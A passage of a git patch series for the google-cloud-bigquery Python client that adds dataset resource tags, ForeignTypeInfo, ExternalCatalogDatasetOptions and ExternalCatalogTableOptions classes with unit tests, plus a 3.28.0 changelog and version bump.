"resource_tags"]) self.assertEqual(ds3.labels, {"color": "green", "shape": "circle"}) + self.assertEqual( + ds3.resource_tags, + { + f"{Config.CLIENT.project}/{tag_1}": "dev", + f"{Config.CLIENT.project}/{tag_3}": "atlas", + }, + ) + + # Remove all tags + ds3.resource_tags = None + ds4 = Config.CLIENT.update_dataset(ds3, ["resource_tags"]) + self.assertEqual(ds4.resource_tags, {}) # If we try to update using d2 again, it will fail because the # previous update changed the ETag. 
diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index cd336b73f..14089b031 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -2028,6 +2028,7 @@ def test_update_dataset(self): LABELS = {"priority": "high"} ACCESS = [{"role": "OWNER", "userByEmail": "phred@example.com"}] EXP = 17 + RESOURCE_TAGS = {"123456789012/key": "value"} RESOURCE = { "datasetReference": {"projectId": self.PROJECT, "datasetId": self.DS_ID}, "etag": "etag", @@ -2037,6 +2038,7 @@ def test_update_dataset(self): "defaultTableExpirationMs": EXP, "labels": LABELS, "access": ACCESS, + "resourceTags": RESOURCE_TAGS, } creds = _make_credentials() client = self._make_one(project=self.PROJECT, credentials=creds) @@ -2048,12 +2050,14 @@ def test_update_dataset(self): ds.default_table_expiration_ms = EXP ds.labels = LABELS ds.access_entries = [AccessEntry("OWNER", "userByEmail", "phred@example.com")] + ds.resource_tags = RESOURCE_TAGS fields = [ "description", "friendly_name", "location", "labels", "access_entries", + "resource_tags", ] with mock.patch( @@ -2077,6 +2081,7 @@ def test_update_dataset(self): "location": LOCATION, "labels": LABELS, "access": ACCESS, + "resourceTags": RESOURCE_TAGS, }, path="/" + PATH, timeout=7.5, @@ -2086,6 +2091,7 @@ def test_update_dataset(self): self.assertEqual(ds2.location, ds.location) self.assertEqual(ds2.labels, ds.labels) self.assertEqual(ds2.access_entries, ds.access_entries) + self.assertEqual(ds2.resource_tags, ds.resource_tags) # ETag becomes If-Match header. 
ds._properties["etag"] = "etag" diff --git a/tests/unit/test_create_dataset.py b/tests/unit/test_create_dataset.py index a2491a812..bd7c6a8f8 100644 --- a/tests/unit/test_create_dataset.py +++ b/tests/unit/test_create_dataset.py @@ -65,6 +65,7 @@ def test_create_dataset_w_attrs(client, PROJECT, DS_ID): "tableId": "northern-hemisphere", } DEFAULT_ROUNDING_MODE = "ROUND_HALF_EVEN" + RESOURCE_TAGS = {"123456789012/foo": "bar"} RESOURCE = { "datasetReference": {"projectId": PROJECT, "datasetId": DS_ID}, "etag": "etag", @@ -76,6 +77,7 @@ def test_create_dataset_w_attrs(client, PROJECT, DS_ID): "labels": LABELS, "access": [{"role": "OWNER", "userByEmail": USER_EMAIL}, {"view": VIEW}], "defaultRoundingMode": DEFAULT_ROUNDING_MODE, + "resourceTags": RESOURCE_TAGS, } conn = client._connection = make_connection(RESOURCE) entries = [ @@ -91,6 +93,7 @@ def test_create_dataset_w_attrs(client, PROJECT, DS_ID): before.default_table_expiration_ms = 3600 before.location = LOCATION before.labels = LABELS + before.resource_tags = RESOURCE_TAGS before.default_rounding_mode = DEFAULT_ROUNDING_MODE after = client.create_dataset(before) assert after.dataset_id == DS_ID @@ -103,6 +106,7 @@ def test_create_dataset_w_attrs(client, PROJECT, DS_ID): assert after.default_table_expiration_ms == 3600 assert after.labels == LABELS assert after.default_rounding_mode == DEFAULT_ROUNDING_MODE + assert after.resource_tags == RESOURCE_TAGS conn.api_request.assert_called_once_with( method="POST", @@ -119,6 +123,7 @@ def test_create_dataset_w_attrs(client, PROJECT, DS_ID): {"view": VIEW, "role": None}, ], "labels": LABELS, + "resourceTags": RESOURCE_TAGS, }, timeout=DEFAULT_TIMEOUT, ) diff --git a/tests/unit/test_dataset.py b/tests/unit/test_dataset.py index c0164bc73..46bcd6611 100644 --- a/tests/unit/test_dataset.py +++ b/tests/unit/test_dataset.py @@ -894,6 +894,28 @@ def test_location_setter(self): dataset.location = "LOCATION" self.assertEqual(dataset.location, "LOCATION") + def 
test_resource_tags_update_in_place(self): + dataset = self._make_one(self.DS_REF) + tags = dataset.resource_tags + tags["123456789012/foo"] = "bar" # update in place + self.assertEqual(dataset.resource_tags, {"123456789012/foo": "bar"}) + + def test_resource_tags_setter(self): + dataset = self._make_one(self.DS_REF) + dataset.resource_tags = {"123456789012/foo": "bar"} + self.assertEqual(dataset.resource_tags, {"123456789012/foo": "bar"}) + + def test_resource_tags_setter_bad_value(self): + dataset = self._make_one(self.DS_REF) + with self.assertRaises(ValueError): + dataset.resource_tags = "invalid" + with self.assertRaises(ValueError): + dataset.resource_tags = 123 + + def test_resource_tags_getter_missing_value(self): + dataset = self._make_one(self.DS_REF) + self.assertEqual(dataset.resource_tags, {}) + def test_labels_update_in_place(self): dataset = self._make_one(self.DS_REF) del dataset._properties["labels"] # don't start w/ existing dict From 55ca63c23fcb56573e2de67e4f7899939628c4a1 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Tue, 14 Jan 2025 23:14:02 -0500 Subject: [PATCH 051/202] feat: Adds ForeignTypeInfo class and tests (#2110) * Adds ForeignTypeInfo class and tests * Tweak to docstring * minor adjustment in test to enhance code coverage * Updates spacing in docstrings * More updates to spacing in docstrings. --- google/cloud/bigquery/schema.py | 64 ++++++++++++++++++++++++++++- tests/unit/test_schema.py | 71 ++++++++++++++++++++++++++++++++- 2 files changed, 131 insertions(+), 4 deletions(-) diff --git a/google/cloud/bigquery/schema.py b/google/cloud/bigquery/schema.py index 8d62b2b5b..b278b686a 100644 --- a/google/cloud/bigquery/schema.py +++ b/google/cloud/bigquery/schema.py @@ -560,6 +560,63 @@ def to_api_repr(self) -> dict: return answer +class ForeignTypeInfo: + """Metadata about the foreign data type definition such as the system in which the + type is defined. + + Args: + type_system (str): Required. 
Specifies the system which defines the + foreign data type. + + TypeSystem enum currently includes: + * "TYPE_SYSTEM_UNSPECIFIED" + * "HIVE" + """ + + def __init__(self, type_system: Optional[str] = None): + self._properties: Dict[str, Any] = {} + self.type_system = type_system + + @property + def type_system(self) -> Optional[str]: + """Required. Specifies the system which defines the foreign data + type.""" + + return self._properties.get("typeSystem") + + @type_system.setter + def type_system(self, value: Optional[str]): + value = _helpers._isinstance_or_raise(value, str, none_allowed=True) + self._properties["typeSystem"] = value + + def to_api_repr(self) -> dict: + """Build an API representation of this object. + + Returns: + Dict[str, Any]: + A dictionary in the format used by the BigQuery API. + """ + + return self._properties + + @classmethod + def from_api_repr(cls, api_repr: Dict[str, Any]) -> "ForeignTypeInfo": + """Factory: constructs an instance of the class (cls) + given its API representation. + + Args: + api_repr (Dict[str, Any]): + API representation of the object to be instantiated. + + Returns: + An instance of the class initialized with data from 'api_repr'. + """ + + config = cls() + config._properties = api_repr + return config + + class SerDeInfo: """Serializer and deserializer information. @@ -625,6 +682,7 @@ def parameters(self, value: Optional[dict[str, str]] = None): def to_api_repr(self) -> dict: """Build an API representation of this object. + Returns: Dict[str, Any]: A dictionary in the format used by the BigQuery API. @@ -635,11 +693,13 @@ def to_api_repr(self) -> dict: def from_api_repr(cls, api_repr: dict) -> SerDeInfo: """Factory: constructs an instance of the class (cls) given its API representation. + Args: - resource (Dict[str, Any]): + api_repr (Dict[str, Any]): API representation of the object to be instantiated. + Returns: - An instance of the class initialized with data from 'resource'. 
+ An instance of the class initialized with data from 'api_repr'. """ config = cls("PLACEHOLDER") config._properties = api_repr diff --git a/tests/unit/test_schema.py b/tests/unit/test_schema.py index 7e84dd63f..efbc5d26f 100644 --- a/tests/unit/test_schema.py +++ b/tests/unit/test_schema.py @@ -1128,6 +1128,73 @@ def test_to_api_repr_parameterized(field, api): assert SchemaField(**field).to_api_repr() == api +class TestForeignTypeInfo: + """Tests for ForeignTypeInfo objects.""" + + @staticmethod + def _get_target_class(): + from google.cloud.bigquery.schema import ForeignTypeInfo + + return ForeignTypeInfo + + def _make_one(self, *args, **kw): + return self._get_target_class()(*args, **kw) + + @pytest.mark.parametrize( + "type_system,expected", + [ + (None, None), + ("TYPE_SYSTEM_UNSPECIFIED", "TYPE_SYSTEM_UNSPECIFIED"), + ("HIVE", "HIVE"), + ], + ) + def test_ctor_valid_input(self, type_system, expected): + result = self._make_one(type_system=type_system) + + assert result.type_system == expected + + def test_ctor_invalid_input(self): + with pytest.raises(TypeError) as e: + self._make_one(type_system=123) + + # Looking for the first word from the string "Pass as..." + assert "Pass " in str(e.value) + + @pytest.mark.parametrize( + "type_system,expected", + [ + ("TYPE_SYSTEM_UNSPECIFIED", {"typeSystem": "TYPE_SYSTEM_UNSPECIFIED"}), + ("HIVE", {"typeSystem": "HIVE"}), + (None, {"typeSystem": None}), + ], + ) + def test_to_api_repr(self, type_system, expected): + result = self._make_one(type_system=type_system) + + assert result.to_api_repr() == expected + + def test_from_api_repr(self): + """GIVEN an api representation of a ForeignTypeInfo object (i.e. api_repr) + WHEN converted into a ForeignTypeInfo object using from_api_repr() + THEN it will have the same representation in dict format as a ForeignTypeInfo + object made directly (via _make_one()) and represented in dict format. 
+ """ + api_repr = { + "typeSystem": "TYPE_SYSTEM_UNSPECIFIED", + } + + expected = self._make_one( + type_system="TYPE_SYSTEM_UNSPECIFIED", + ) + + klass = self._get_target_class() + result = klass.from_api_repr(api_repr) + + # We convert both to dict format because these classes do not have a + # __eq__() method to facilitate direct equality comparisons. + assert result.to_api_repr() == expected.to_api_repr() + + class TestSerDeInfo: """Tests for the SerDeInfo class.""" @@ -1190,9 +1257,9 @@ def test_to_api_repr(self): assert serde_info.to_api_repr() == expected_repr def test_from_api_repr(self): - """GIVEN an api representation of a SerDeInfo object (i.e. resource) + """GIVEN an api representation of a SerDeInfo object (i.e. api_repr) WHEN converted into a SerDeInfo object using from_api_repr() - THEN it will have the representation in dict format as a SerDeInfo + THEN it will have the same representation in dict format as a SerDeInfo object made directly (via _make_one()) and represented in dict format. 
""" api_repr = { From b929a900d49e2c15897134209ed9de5fc7f238cd Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Wed, 15 Jan 2025 12:44:27 -0500 Subject: [PATCH 052/202] feat: adds ExternalCatalogDatasetOptions and tests (#2111) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat: adds ExternalCatalogDatasetOptions and tests * Update google/cloud/bigquery/dataset.py Co-authored-by: Tim Sweña (Swast) * Update google/cloud/bigquery/dataset.py Co-authored-by: Tim Sweña (Swast) * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Tim Sweña (Swast) Co-authored-by: Owl Bot --- google/cloud/bigquery/dataset.py | 25 +++++++ google/cloud/bigquery/external_config.py | 76 +++++++++++++++++++- tests/unit/test_dataset.py | 84 ++++++++++++++++++++++ tests/unit/test_external_config.py | 89 ++++++++++++++++++++++++ 4 files changed, 273 insertions(+), 1 deletion(-) diff --git a/google/cloud/bigquery/dataset.py b/google/cloud/bigquery/dataset.py index 4d06d729d..15a11fb40 100644 --- a/google/cloud/bigquery/dataset.py +++ b/google/cloud/bigquery/dataset.py @@ -27,6 +27,7 @@ from google.cloud.bigquery.routine import Routine, RoutineReference from google.cloud.bigquery.table import Table, TableReference from google.cloud.bigquery.encryption_configuration import EncryptionConfiguration +from google.cloud.bigquery import external_config from typing import Optional, List, Dict, Any, Union @@ -531,6 +532,7 @@ class Dataset(object): "max_time_travel_hours": "maxTimeTravelHours", "default_rounding_mode": "defaultRoundingMode", "resource_tags": "resourceTags", + "external_catalog_dataset_options": "externalCatalogDatasetOptions", } def __init__(self, dataset_ref) -> None: @@ -898,6 +900,29 @@ def storage_billing_model(self, value): ) self._properties["storageBillingModel"] = value + @property + def external_catalog_dataset_options(self): + 
"""Options defining open source compatible datasets living in the + BigQuery catalog. Contains metadata of open source database, schema + or namespace represented by the current dataset.""" + + prop = _helpers._get_sub_prop( + self._properties, ["externalCatalogDatasetOptions"] + ) + + if prop is not None: + prop = external_config.ExternalCatalogDatasetOptions.from_api_repr(prop) + return prop + + @external_catalog_dataset_options.setter + def external_catalog_dataset_options(self, value): + value = _helpers._isinstance_or_raise( + value, external_config.ExternalCatalogDatasetOptions, none_allowed=True + ) + self._properties[ + self._PROPERTY_TO_API_FIELD["external_catalog_dataset_options"] + ] = (value.to_api_repr() if value is not None else None) + @classmethod def from_string(cls, full_dataset_id: str) -> "Dataset": """Construct a dataset from fully-qualified dataset ID. diff --git a/google/cloud/bigquery/external_config.py b/google/cloud/bigquery/external_config.py index a891bc232..7f2b58f2b 100644 --- a/google/cloud/bigquery/external_config.py +++ b/google/cloud/bigquery/external_config.py @@ -18,7 +18,7 @@ Job.configuration.query.tableDefinitions. """ -from __future__ import absolute_import +from __future__ import absolute_import, annotations import base64 import copy @@ -28,6 +28,7 @@ from google.cloud.bigquery._helpers import _bytes_to_json from google.cloud.bigquery._helpers import _int_or_none from google.cloud.bigquery._helpers import _str_or_none +from google.cloud.bigquery import _helpers from google.cloud.bigquery.format_options import AvroOptions, ParquetOptions from google.cloud.bigquery.schema import SchemaField @@ -1003,3 +1004,76 @@ def from_api_repr(cls, resource: dict) -> "ExternalConfig": config = cls(resource["sourceFormat"]) config._properties = copy.deepcopy(resource) return config + + +class ExternalCatalogDatasetOptions: + """Options defining open source compatible datasets living in the BigQuery catalog. 
+ Contains metadata of open source database, schema or namespace represented + by the current dataset. + + Args: + default_storage_location_uri (Optional[str]): The storage location URI for all + tables in the dataset. Equivalent to hive metastore's database + locationUri. Maximum length of 1024 characters. (str) + parameters (Optional[dict[str, Any]]): A map of key value pairs defining the parameters + and properties of the open source schema. Maximum size of 2Mib. + """ + + def __init__( + self, + default_storage_location_uri: Optional[str] = None, + parameters: Optional[Dict[str, Any]] = None, + ): + self._properties: Dict[str, Any] = {} + self.default_storage_location_uri = default_storage_location_uri + self.parameters = parameters + + @property + def default_storage_location_uri(self) -> Optional[str]: + """Optional. The storage location URI for all tables in the dataset. + Equivalent to hive metastore's database locationUri. Maximum length of + 1024 characters.""" + + return self._properties.get("defaultStorageLocationUri") + + @default_storage_location_uri.setter + def default_storage_location_uri(self, value: Optional[str]): + value = _helpers._isinstance_or_raise(value, str, none_allowed=True) + self._properties["defaultStorageLocationUri"] = value + + @property + def parameters(self) -> Optional[Dict[str, Any]]: + """Optional. A map of key value pairs defining the parameters and + properties of the open source schema. Maximum size of 2Mib.""" + + return self._properties.get("parameters") + + @parameters.setter + def parameters(self, value: Optional[Dict[str, Any]]): + value = _helpers._isinstance_or_raise(value, dict, none_allowed=True) + self._properties["parameters"] = value + + def to_api_repr(self) -> dict: + """Build an API representation of this object. + + Returns: + Dict[str, Any]: + A dictionary in the format used by the BigQuery API. 
+ """ + return self._properties + + @classmethod + def from_api_repr(cls, api_repr: dict) -> ExternalCatalogDatasetOptions: + """Factory: constructs an instance of the class (cls) + given its API representation. + + Args: + api_repr (Dict[str, Any]): + API representation of the object to be instantiated. + + Returns: + An instance of the class initialized with data from 'resource'. + """ + config = cls() + config._properties = api_repr + return config diff --git a/tests/unit/test_dataset.py b/tests/unit/test_dataset.py index 46bcd6611..8ab8dffec 100644 --- a/tests/unit/test_dataset.py +++ b/tests/unit/test_dataset.py @@ -650,6 +650,16 @@ class TestDataset(unittest.TestCase): DS_ID = "dataset-id" DS_REF = DatasetReference(PROJECT, DS_ID) KMS_KEY_NAME = "projects/1/locations/us/keyRings/1/cryptoKeys/1" + DEFAULT_STORAGE_LOCATION_URI = "gs://test-bucket/test-path" + PARAMETERS = {"key": "value"} + API_REPR = { + "datasetReference": {"projectId": "project", "datasetId": "dataset-id"}, + "labels": {}, + "externalCatalogDatasetOptions": { + "defaultStorageLocationUri": DEFAULT_STORAGE_LOCATION_URI, + "parameters": PARAMETERS, + }, + } @staticmethod def _get_target_class(): @@ -1067,6 +1077,80 @@ def test___repr__(self): expected = "Dataset(DatasetReference('project1', 'dataset1'))" self.assertEqual(repr(dataset), expected) + def test_external_catalog_dataset_options_setter(self): + # GIVEN the parameters DEFAULT_STORAGE_LOCATION_URI and PARAMETERS + # WHEN an ExternalCatalogDatasetOptions obj is created + # and added to a dataset. 
+ # THEN the api representation of the dataset will match API_REPR + + from google.cloud.bigquery.external_config import ExternalCatalogDatasetOptions + + dataset = self._make_one(self.DS_REF) + + ecdo_obj = ExternalCatalogDatasetOptions( + default_storage_location_uri=self.DEFAULT_STORAGE_LOCATION_URI, + parameters=self.PARAMETERS, + ) + dataset.external_catalog_dataset_options = ecdo_obj + + result = dataset.to_api_repr() + expected = self.API_REPR + assert result == expected + + def test_external_catalog_dataset_options_getter_prop_exists(self): + # GIVEN default dataset PLUS an ExternalCatalogDatasetOptions + # THEN confirm that the api_repr of the ExternalCatalogDatasetsOptions + # matches the api_repr of the external_catalog_dataset_options attribute. + + from google.cloud.bigquery.external_config import ExternalCatalogDatasetOptions + + dataset = self._make_one(self.DS_REF) + ecdo_obj = ExternalCatalogDatasetOptions( + default_storage_location_uri=self.DEFAULT_STORAGE_LOCATION_URI, + parameters=self.PARAMETERS, + ) + dataset.external_catalog_dataset_options = ecdo_obj + result = dataset.external_catalog_dataset_options.to_api_repr() + expected = ecdo_obj.to_api_repr() + assert result == expected + + def test_external_catalog_dataset_options_getter_prop_is_none(self): + # GIVEN only a default dataset + # THEN confirm that external_catalog_dataset_options is None + + dataset = self._make_one(self.DS_REF) + expected = None + result = dataset.external_catalog_dataset_options + assert result == expected + + def test_external_catalog_dataset_options_from_api_repr(self): + # GIVEN default dataset including an ExternalCatalogDatasetOptions + # THEN confirm that the api_repr of the ExternalCatalogDatasetsOptions + # on a dataset object created via from_api_repr matches the api_repr + # of the "externalCatalogDatasetOptions" key. 
+ + api_repr = self.API_REPR + klass = self._get_target_class() + dataset = klass.from_api_repr(api_repr) + + result = dataset.external_catalog_dataset_options.to_api_repr() + expected = api_repr["externalCatalogDatasetOptions"] + assert result == expected + + def test_external_catalog_dataset_options_to_api_repr(self): + # GIVEN a dataset api_repr including an ExternalCatalogDatasetOptions key + # THEN confirm that the api_repr of that key from a dataset object created + # via the to_api_repr() method matches the value of the key + # used to create the dataset object + + api_repr = self.API_REPR + klass = self._get_target_class() + dataset = klass.from_api_repr(api_repr) + + result = dataset.to_api_repr()["externalCatalogDatasetOptions"] + expected = api_repr["externalCatalogDatasetOptions"] + assert result == expected + class TestDatasetListItem(unittest.TestCase): @staticmethod diff --git a/tests/unit/test_external_config.py b/tests/unit/test_external_config.py index 9fd16e699..0c27d8e56 100644 --- a/tests/unit/test_external_config.py +++ b/tests/unit/test_external_config.py @@ -19,6 +19,8 @@ from google.cloud.bigquery import external_config from google.cloud.bigquery import schema +import pytest + class TestExternalConfig(unittest.TestCase): SOURCE_URIS = ["gs://foo", "gs://bar"] @@ -890,3 +892,90 @@ def _copy_and_update(d, u): d = copy.deepcopy(d) d.update(u) return d + + +class TestExternalCatalogDatasetOptions: + @staticmethod + def _get_target_class(): + from google.cloud.bigquery.external_config import ExternalCatalogDatasetOptions + + return ExternalCatalogDatasetOptions + + def _make_one(self, *args, **kw): + return self._get_target_class()(*args, **kw) + + DEFAULT_STORAGE_LOCATION_URI = "gs://test-bucket/test-path" + PARAMETERS = {"key": "value"} + + @pytest.mark.parametrize( + "default_storage_location_uri,parameters", + [ + (DEFAULT_STORAGE_LOCATION_URI, PARAMETERS), # set all params + (DEFAULT_STORAGE_LOCATION_URI, None), # set only one argument at a 
time + (None, PARAMETERS), + (None, None), # use default parameters + ], + ) + def test_ctor_initialization( + self, + default_storage_location_uri, + parameters, + ): + """Test ExternalCatalogDatasetOptions constructor with explicit values.""" + + instance = self._make_one( + default_storage_location_uri=default_storage_location_uri, + parameters=parameters, + ) + + assert instance.default_storage_location_uri == default_storage_location_uri + assert instance.parameters == parameters + + @pytest.mark.parametrize( + "default_storage_location_uri,parameters", + [ + (123, None), # does not accept integers + (None, 123), + ], + ) + def test_ctor_invalid_input(self, default_storage_location_uri, parameters): + """Test ExternalCatalogDatasetOptions constructor with invalid input.""" + + with pytest.raises(TypeError) as e: + self._make_one( + default_storage_location_uri=default_storage_location_uri, + parameters=parameters, + ) + + # Looking for the first word from the string "Pass as..." + assert "Pass " in str(e.value) + + def test_to_api_repr(self): + """Test ExternalCatalogDatasetOptions.to_api_repr method.""" + + instance = self._make_one( + default_storage_location_uri=self.DEFAULT_STORAGE_LOCATION_URI, + parameters=self.PARAMETERS, + ) + resource = instance.to_api_repr() + assert ( + resource["defaultStorageLocationUri"] == self.DEFAULT_STORAGE_LOCATION_URI + ) + assert resource["parameters"] == self.PARAMETERS + + def test_from_api_repr(self): + """GIVEN an api representation of an ExternalCatalogDatasetOptions object (i.e. api_repr) + WHEN converted into an ExternalCatalogDatasetOptions object using from_api_repr() + THEN it will have the representation in dict format as an ExternalCatalogDatasetOptions + object made directly (via _make_one()) and represented in dict format. 
+ """ + + instance = self._make_one() + api_repr = { + "defaultStorageLocationUri": self.DEFAULT_STORAGE_LOCATION_URI, + "parameters": self.PARAMETERS, + } + result = instance.from_api_repr(api_repr) + + assert isinstance(result, external_config.ExternalCatalogDatasetOptions) + assert result._properties == api_repr From 9c504186f03ffb8b86836c683912b310db2435e9 Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Wed, 15 Jan 2025 10:22:48 -0800 Subject: [PATCH 053/202] chore(main): release 3.28.0 (#2056) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> --- CHANGELOG.md | 28 ++++++++++++++++++++++++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 29 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 989b7f020..6a7ff5641 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,34 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.28.0](https://github.com/googleapis/python-bigquery/compare/v3.27.0...v3.28.0) (2025-01-15) + + +### Features + +* Add property for `allowNonIncrementalDefinition` for materialized view ([#2084](https://github.com/googleapis/python-bigquery/issues/2084)) ([3359ef3](https://github.com/googleapis/python-bigquery/commit/3359ef37b90243bea2d9e68bb996fe5d736f304c)) +* Add property for maxStaleness in table definitions ([#2087](https://github.com/googleapis/python-bigquery/issues/2087)) ([729322c](https://github.com/googleapis/python-bigquery/commit/729322c2288a30464f2f135ba18b9c4aa7d2f0da)) +* Add type hints to Client ([#2044](https://github.com/googleapis/python-bigquery/issues/2044)) ([40529de](https://github.com/googleapis/python-bigquery/commit/40529de923e25c41c6728c121b9c82a042967ada)) +* Adds ExternalCatalogDatasetOptions and tests ([#2111](https://github.com/googleapis/python-bigquery/issues/2111)) 
([b929a90](https://github.com/googleapis/python-bigquery/commit/b929a900d49e2c15897134209ed9de5fc7f238cd)) +* Adds ForeignTypeInfo class and tests ([#2110](https://github.com/googleapis/python-bigquery/issues/2110)) ([55ca63c](https://github.com/googleapis/python-bigquery/commit/55ca63c23fcb56573e2de67e4f7899939628c4a1)) +* Adds new input validation function similar to isinstance. ([#2107](https://github.com/googleapis/python-bigquery/issues/2107)) ([a2bebb9](https://github.com/googleapis/python-bigquery/commit/a2bebb95c5ef32ac7c7cbe19c3e7a9412cbee60d)) +* Adds StorageDescriptor and tests ([#2109](https://github.com/googleapis/python-bigquery/issues/2109)) ([6be0272](https://github.com/googleapis/python-bigquery/commit/6be0272ff25dac97a38ae4ee5aa02016dc82a0d8)) +* Adds the SerDeInfo class and tests ([#2108](https://github.com/googleapis/python-bigquery/issues/2108)) ([62960f2](https://github.com/googleapis/python-bigquery/commit/62960f255d05b15940a8d2cdc595592175fada11)) +* Migrate to pyproject.toml ([#2041](https://github.com/googleapis/python-bigquery/issues/2041)) ([1061611](https://github.com/googleapis/python-bigquery/commit/106161180ead01aca1ead909cf06ca559f68666d)) +* Preserve unknown fields from the REST API representation in `SchemaField` ([#2097](https://github.com/googleapis/python-bigquery/issues/2097)) ([aaf1eb8](https://github.com/googleapis/python-bigquery/commit/aaf1eb85ada95ab866be0199812ea7f5c7f50766)) +* Resource tags in dataset ([#2090](https://github.com/googleapis/python-bigquery/issues/2090)) ([3e13016](https://github.com/googleapis/python-bigquery/commit/3e130166f43dcc06704fe90edf9068dfd44842a6)) +* Support setting max_stream_count when fetching query result ([#2051](https://github.com/googleapis/python-bigquery/issues/2051)) ([d461297](https://github.com/googleapis/python-bigquery/commit/d4612979b812d2a835e47200f27a87a66bcb856a)) + + +### Bug Fixes + +* Allow geopandas 1.x ([#2065](https://github.com/googleapis/python-bigquery/issues/2065)) 
([f2ab8cb](https://github.com/googleapis/python-bigquery/commit/f2ab8cbfe00d442ad3b40683ecfec320e53b4688)) + + +### Documentation + +* Render fields correctly for update calls ([#2055](https://github.com/googleapis/python-bigquery/issues/2055)) ([a4d9534](https://github.com/googleapis/python-bigquery/commit/a4d9534a900f13ae7355904cda05097d781f27e3)) + ## [3.27.0](https://github.com/googleapis/python-bigquery/compare/v3.26.0...v3.27.0) (2024-11-01) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index 8f4418777..7da2c534f 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.27.0" +__version__ = "3.28.0" From 7de6822e1c556a68cb8d50e90664c094697cca1d Mon Sep 17 00:00:00 2001 From: Lingqing Gan Date: Fri, 17 Jan 2025 10:24:06 -0800 Subject: [PATCH 054/202] fix: add default value in SchemaField.from_api_repr() (#2115) --- google/cloud/bigquery/schema.py | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/google/cloud/bigquery/schema.py b/google/cloud/bigquery/schema.py index b278b686a..42dfbfca8 100644 --- a/google/cloud/bigquery/schema.py +++ b/google/cloud/bigquery/schema.py @@ -228,6 +228,12 @@ def from_api_repr(cls, api_repr: dict) -> "SchemaField": # fields. See https://github.com/googleapis/python-bigquery/issues/6 placeholder._properties = api_repr + # Add the field `mode` with default value if it does not exist. 
Fixes + # an incompatibility issue with pandas-gbq: + # https://github.com/googleapis/python-bigquery-pandas/issues/854 + if "mode" not in placeholder._properties: + placeholder._properties["mode"] = "NULLABLE" + return placeholder @property From cdc1a6e1623b8305c6a6a1a481b3365e866a073d Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Tue, 21 Jan 2025 06:04:34 -0500 Subject: [PATCH 055/202] feat: add ExternalCatalogTableOptions class and tests (#2116) * Updates most of external_catalog_table_options * Adds ExternalCatalogTableOptions and tests --- google/cloud/bigquery/external_config.py | 107 ++++++++++++++++++ google/cloud/bigquery/magics/magics.py | 2 +- google/cloud/bigquery/table.py | 35 ++++++ tests/unit/test_external_config.py | 137 +++++++++++++++++++++++ tests/unit/test_table.py | 87 ++++++++++++++ 5 files changed, 367 insertions(+), 1 deletion(-) diff --git a/google/cloud/bigquery/external_config.py b/google/cloud/bigquery/external_config.py index 7f2b58f2b..73c4acabf 100644 --- a/google/cloud/bigquery/external_config.py +++ b/google/cloud/bigquery/external_config.py @@ -30,6 +30,7 @@ from google.cloud.bigquery._helpers import _str_or_none from google.cloud.bigquery import _helpers from google.cloud.bigquery.format_options import AvroOptions, ParquetOptions +from google.cloud.bigquery import schema from google.cloud.bigquery.schema import SchemaField @@ -1077,3 +1078,109 @@ def from_api_repr(cls, api_repr: dict) -> ExternalCatalogDatasetOptions: config = cls() config._properties = api_repr return config + + +class ExternalCatalogTableOptions: + """Metadata about open source compatible table. The fields contained in these + options correspond to hive metastore's table level properties. + + Args: + connection_id (Optional[str]): The connection specifying the credentials to be + used to read external storage, such as Azure Blob, Cloud Storage, or + S3. The connection is needed to read the open source table from + BigQuery Engine. 
The connection_id can have the form `{project_id}.{location_id}.{connection_id}` or + `projects/{project_id}/locations/{location_id}/connections/{connection_id}`. + parameters (Union[Dict[str, Any], None]): A map of key value pairs defining the parameters + and properties of the open source table. Corresponds with hive meta + store table parameters. Maximum size of 4MiB. + storage_descriptor (Optional[StorageDescriptor]): A storage descriptor containing information + about the physical storage of this table. + """ + + def __init__( + self, + connection_id: Optional[str] = None, + parameters: Union[Dict[str, Any], None] = None, + storage_descriptor: Optional[schema.StorageDescriptor] = None, + ): + self._properties: Dict[str, Any] = {} + self.connection_id = connection_id + self.parameters = parameters + self.storage_descriptor = storage_descriptor + + @property + def connection_id(self) -> Optional[str]: + """Optional. The connection specifying the credentials to be + used to read external storage, such as Azure Blob, Cloud Storage, or + S3. The connection is needed to read the open source table from + BigQuery Engine. The connection_id can have the form `{project_id}.{location_id}.{connection_id}` or + `projects/{project_id}/locations/{location_id}/connections/{connection_id}`. + """ + + return self._properties.get("connectionId") + + @connection_id.setter + def connection_id(self, value: Optional[str]): + value = _helpers._isinstance_or_raise(value, str, none_allowed=True) + self._properties["connectionId"] = value + + @property + def parameters(self) -> Union[Dict[str, Any], None]: + """Optional. A map of key value pairs defining the parameters and + properties of the open source table. Corresponds with hive meta + store table parameters. Maximum size of 4MiB. + """ + + return self._properties.get("parameters") + + @parameters.setter + def parameters(self, value: Union[Dict[str, Any], None]): + value = _helpers._isinstance_or_raise(value, dict, none_allowed=True) + self._properties["parameters"] = value + + @property + def storage_descriptor(self) -> Any: + """Optional.
